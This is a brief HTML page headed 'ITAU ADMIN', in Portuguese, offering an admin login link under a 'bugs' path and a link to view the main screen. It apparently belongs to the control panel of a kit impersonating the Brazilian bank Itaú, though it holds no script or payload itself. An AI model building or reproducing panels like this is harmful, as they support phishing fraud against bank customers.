﻿<!DOCTYPE html>
<html lang="en">
  <head> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=0"> 
  <link rel="dns-prefetch" href="https://in.hotjar.com"> 
  <link rel="dns-prefetch" href="https://vars.hotjar.com"> 
  <link rel="dns-prefetch" href="https://script.hotjar.com"> 
  <link rel="dns-prefetch" href="https://static.hotjar.com"> 
  <link rel="dns-prefetch" href="https://me.jsuol.com.br"> 
  <link rel="dns-prefetch" href="https://api.boacompra.com"> 
  <link rel="dns-prefetch" href="//me.jsuol.com.br"> 
  <link rel="icon" href="bugs/img/bugs.jpg"> 

    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>ITAU ADMIN</title>
<link rel="stylesheet" type="text/css" href="style.css">
  </head>
  <body>
    		<style>
		h1 {
					font-family:Georgia, "Times New Roman", Times, serif;
					font-style:italic;
					font-size:20px;
					color:#28a745;
					letter-spacing:-0.05;
					text-shadow:1px 1px 1px 	#000;
		}

		</style>
<div class="buttons">
  <div class="container">
    <center>
 <img src="bugs/img/bugs.jpg" width="300px"  style="border-radius: 70%;">
 </center>
      <h1>ADMIN</h1>
      <p><h2>Olá Usuario</h2></p>
      <a href="bugs/adm" class="btn effect04" data-sm-link-text="CLIQUE"><span>FAZER LOGIN</span></a>
      <br>
      <a href="index.php" class="btn effect04" data-sm-link-text="CLIQUE"><span>Ver Tela</span></a>
  </div>
</div>
  </body>
</html>
